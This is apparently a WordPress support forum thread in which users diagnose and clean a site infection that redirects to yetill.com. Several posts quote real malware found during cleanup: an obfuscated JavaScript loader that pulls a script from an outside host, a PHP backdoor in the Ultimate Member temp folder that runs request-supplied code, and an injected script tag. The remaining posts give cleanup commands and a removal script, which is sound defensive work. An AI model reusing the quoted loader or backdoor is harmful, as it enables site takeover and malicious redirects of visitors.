Anyone who can help me how to fix my site? It is always redirecting to yetill.com. I searched about this site and i learned that it is a kind of malware. Tried various solutions found on the net but still not solved.
Thanks.
Anyone who can help me how to fix my site? It is always redirecting to yetill.com. I searched about this site and i learned that it is a kind of malware. Tried various solutions found on the net but still not solved.
Thanks.
Preliminary steps:
/*! jQuery v1.... Delete anything before that line (you made a backup, right?)Background:
We have the same problem. Wordfence noticed that the file wp-includes/js/jquery/jquery.js was modified on the server. Restoring it to the original version seemed to solve it. BUT, the file got infected quickly (hours?). So we do not know the source yet...
We found some suspicious code in /wp-content/uploads/ultimatemember/temp/[random dir]/n.php:
<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>
That basically executes any PHP code from outside...
After deleting those files, the site did seemed back to normal (couple of hours).
We also noticed a suspicious <a> tag in the page source; but not sure about its relevance.
<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>
You will have to do some troubleshooting. It is either your theme or one of your plugins that contains the malicious code.
Follow these steps:
TwentySeventeen - If the issue
persists, it means it is not your theme.Hope this helps.
We have the same error, these files were infected. This is the malicious code I've found in them.
wp-includes/js/jquery/jquery.js
(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();
themes/yourtheme/header.php
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
jquery file was infected in my case. Just delete the code before /*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */ and make sure that all of your plugins are updated and the site is secure. Also chech the permissions of the files! That helps me in my case
It seems that this is caused by the vulnerability of some plugins you might be using.
In my case it was the older version (prior to 2.22) of Ultimate Member plugin.
If you are using version 2.22 or earlier of this plugin, you should update this plugin immediately, and purge temp files. (https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/)
After that, search recently updated files with this command. (e.g. 15 days)
find ./ -type f -mtime -15
Chances are your WP jquery file and any files with name "header" is likely to be infected.
/wp-includes/js/jquery/jquery.js
/wp-contents/your-theme/header.php
..
Remove the following script in your infected header files.
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
It looks like this is inserted right after opening head tag and right before closing head tag. Make sure you delete both.
Remove maliciously inserted script from infected Jquery file or just replace the file with clean one from other WP Core installations.
I think this should fix the issue.
This is what I found today after running securi scanner. Hopefully this helps someone because this one is a nasty one. It appears in my case to be affecting the following files:
Whatever it was seemed to have gone ham on my wp-includes directory. I do run Ultimate Member plugin and I noticed someone mentioned before that earlier versions of this plugin had vulnerabilities. I run a multi-site network, and also noticed that two of the registration forms on my sub-sites had the default role of Administrator (what plugin vendor would find that secure as a default registration option?) with the auto approve option enabled (no verification emails). Apparently activating this plugin in a network environment requires some extra thorough review on those registration and sign in forms.
Had the same issue. jquery was infected and had to be replaced with the original version. The hacker probably used ultimatemember backdoor to upload a php file and execute it. I had to clean up the plugin temp directory.
Another observation was that the hack was forcing modified jquery to load script, which address was loaded from http://src.eeduelements.com/get.php . This gives them the flexibility to rotate the ads.
sudo grep --include=\*.php -rnw . -e "<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>"
that along with this answer below helped me clean my files. It affected all of my websites but now seems to still persist on the site that had ultimate member on it. Still working on it. This Php script was incredible though. thanks to the writer for sure.
PHP/SSH regex script/command to delete identical malware code from many files
This is the php from the above answer. I just swapped out the find portion with the malicious stuff redirecting to yetill.
<?php
//Enter it as it is and escape any single quotes
$find='<script type=\'text/javascript\' src=\'https://cdn.eeduelements.com/jquery.js?ver=1.0.8\'></script>';
echo findString('./',$find);
function findString($path,$find){
$return='';
ob_start();
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
if(is_dir($path.'/'.$file)){
$sub=findString($path.'/'.$file,$find);
if(isset($sub)){
echo $sub.PHP_EOL;
}
}else{
$ext=substr(strtolower($file),-3);
if($ext=='php'){
$filesource=file_get_contents($path.'/'.$file);
$pos = strpos($filesource, $find);
if ($pos === false) {
continue;
} else {
//The cleaning bit
echo "The string '".htmlentities($find)."' was found in the file '$path/$file and exists at position $pos and has been removed from the source file.<br />";
$clean_source = str_replace($find,'',$filesource);
file_put_contents($path.'/'.$file,$clean_source);
}
}else{
continue;
}
}
}
}
closedir($handle);
}
$return = ob_get_contents();
ob_end_clean();
return $return;
}
?>